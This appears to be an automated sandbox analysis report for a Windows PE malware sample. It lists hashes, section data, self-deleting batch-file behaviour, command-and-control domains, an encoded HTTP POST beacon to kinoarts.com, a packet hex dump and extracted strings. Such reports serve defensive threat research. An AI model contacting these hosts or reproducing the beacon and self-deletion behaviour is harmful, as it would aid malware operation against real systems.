Analysis Date: 2014-09-23 23:41:11
MD5: 58a47cb7ff17d415765b01a3f1823e00
SHA1: 6ddd4db2fc6cc9a5a22fa0592d698690b8012e96

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .h0ha3 md5: 4de16cf5d1c7cbfe6e474573dcb8cea1 sha1: 4cff2ea7bcfc9b7c857ab8ddda2397ce0c5093cd size: 21504
Section: .2fgb2 md5: 70555bc6f453eb056829048c849c4316 sha1: c9bc41e53903378d3764eda8f375aac1475488b6 size: 12800
Section: .0hb84 md5: c329194b38785481c76aed671c41f9f0 sha1: 702135dffe756662634823124db4ae5804856cdc size: 56320
Section: .ge458 md5: 87134f6e26826c1a739d2ef7d081e08f sha1: c792e44d9aad884ab7c925d3b4063c206718cdaa size: 3072
Section: .rsrc md5: ad5f668bee3b700c3a3491f5567b6c23 sha1: fd76de2cf954426d494137046ae8d414e1d94417 size: 1536
Timestamp: 2007-03-01 13:12:28
PEhash: 54b595517bb8e81c57e77bd7d9b60a59e85e27de
IMPhash: 772d59e43070c991613db02005791ab7

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝ 15000
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Creates Process: C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Process
↳ C:\WINDOWS\system32\cmd.exe /q /c C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat > nul 2> nul

Creates File: nul
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\a..bat
Deletes File: C:\malware.exe

Network Details:

DNS: kinoarts.com
Type: A
192.31.186.4
DNS: petroartsstudio.com
Type: A
DNS: greeartsday.com
Type: A
HTTP POST: http://kinoarts.com/report.php?data=v26MmjSySdehDmJ07AUYRrM7Y7/uI9E8OdYISX0iLBsOWQaH2BXayT3wBU3CcFXegcyUv84UKQ==
User-Agent: wget 3.0
Flows: TCP 192.168.1.1:1031 ➝ 192.31.186.4:80

Raw Pcap
0x00000000 (00000)   504f5354 202f7265 706f7274 2e706870   POST /report.php
0x00000010 (00016)   3f646174 613d7632 364d6d6a 53795364   ?data=v26MmjSySd
0x00000020 (00032)   6568446d 4a303741 55595272 4d375937   ehDmJ07AUYRrM7Y7
0x00000030 (00048)   2f754939 45384f64 59495358 30694c42   /uI9E8OdYISX0iLB
0x00000040 (00064)   734f5751 61483242 58617954 33774255   sOWQaH2BXayT3wBU
0x00000050 (00080)   33436346 58656763 79557638 34554b51   3CcFXegcyUv84UKQ
0x00000060 (00096)   3d3d2048 5454502f 312e310d 0a416363   == HTTP/1.1..Acc
0x00000070 (00112)   6570743a 202a2f0d 0a436f6e 74656e74   ept: */..Content
0x00000080 (00128)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000090 (00144)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x000000a0 (00160)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x000000b0 (00176)   67656e74 3a207767 65742033 2e300d0a   gent: wget 3.0..
0x000000c0 (00192)   486f7374 3a206b69 6e6f6172 74732e63   Host: kinoarts.c
0x000000d0 (00208)   6f6d0d0a 436f6e74 656e742d 4c656e67   om..Content-Leng
0x000000e0 (00224)   74683a20 3132310d 0a436f6e 6e656374   th: 121..Connect
0x000000f0 (00240)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000100 (00256)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000110 (00272)   6e6f2d63 61636865 0d0a0d0a 64617461   no-cache....data
0x00000120 (00288)   3d756a6e 5433324f 2f463971 73447941   =ujnT32O/F9qsDyA
0x00000130 (00304)   7a36566c 4d533735 33502f58 34664d4d   z6VlMS753P/X4fMM
0x00000140 (00320)   78523930 4e43436f 33645531 43485744   xR90NCCo3dU1CHWD
0x00000150 (00336)   5a303065 43324879 32625379 47513058   Z00eC2Hy2bSyGQ0X
0x00000160 (00352)   5431702f 572f5a49 614a6b2b 4f644441   T1p/W/ZIaJk+OdDA
0x00000170 (00368)   7a42324b 364c746d 52314c61 432f716e   zB2K6LtmR1LaC/qn
0x00000180 (00384)   3949756b 362b3732 33775761 2f536b54   9Iuk6+723wWa/SkT
0x00000190 (00400)   7248413d 3d                           rHA==


Strings
(.}
..
D4F5CH
DDD4
EEE2
FE05HCF
	RC_RCDATA
RC_RCDATA2
<<<<<<<<,<<
^0F{V\}
.0hb84
0WQfua
/16yn=,VdE9
(1KJPg
`.2fgb2
3gbb268ghac4741fe2gc4g3dgd7
3K`A~w
3LX=2{.
3~RK6(Q
3up+q9"
3+YZI'
4b97dc47b63e48cf193a85f425ff2f7
4iTzpNwcy
/56H[T
5z+.;(NH
<<<<<-<<8<<)<<<<<)<<><<
8<<<y7t
a\bytj
advapi32.dll
aF[Hv#
AppendMenuW
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
#bgky+'
=c<<<<
CEz}-Mdv
CompareStringA
CopyFileA
CopyFileExA
D@0Hfo
d4Hf<<<4\
Da<<<<
DeleteFileA
DgA\d^su
D_P|zsr
}d(xJD
E]doXg
eegeh320e3hf951hg9a4eae42cf3d
e(hTyd
Ew%Td5
ExitProcess
EZIVH7
Ez*lZ'#
f66e8ffcbdf468d3cfd485e196a6b25g7c786
FindClose
FlushFileBuffers
FormatMessageA
FreeResource
FW-D`P
(g0Q( 
G0w!9j
@.ge458
GetCommandLineA
GetCPInfo
GetFileType
GetFocus
GetLastError
GFufrD
GlobalFree
g.xWZy
\H^<<<
.h0ha3
]h{1Lt
!H{<804
HeapFree
=HS<<<
>H}@zD
i8"ri`z]@uL
@Iz.Dn
j`H}Pgbjp
,JhzK1<
jXdtea
K8t@`4
K_B{}L0 
kernel32.dll
{+KI`d
}k:I#F
ky}l$.
L0&u"+
lc`|KN
lfD\.o
lstrcatA
lstrlenA
lXlT@<
l@z9Bw
M:'y l
:n0`vU
n1\+Iwsb
`nTkz2
ny$\{O(+`
O18{9z:
o{Dc8(
OpenFile
OpenFileMappingA
`(=p4y
pgy!y_8
P.rsrc
pz(ey{87
'q6V8p
QZ<?hN9
RegEnumKeyW
RegOpenKeyExA
RegQueryInfoKeyW
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
rl Ho:Bt
s74^=9
      </security>
      <security>
sTBBSf
t,4vSL
T	8t	<
<<<<t=;B
TfX7E8W
tHd<<<t
!This program cannot be run in DOS mode.
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
user32.dll
VG9.'e
vHV[xr8
vJ#Smz	r
~v+sJ=
Vu]r\H;
vWYZE8
v`Zh_6
WL (e4:
$w>XdJ
^@+wy	
X0H`zhp
x9_|#`
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
X'|wmk~
)y1dqgq9
yfVgSx
)YHxq|
yY/uL(
zi_c%,
z$@j>T"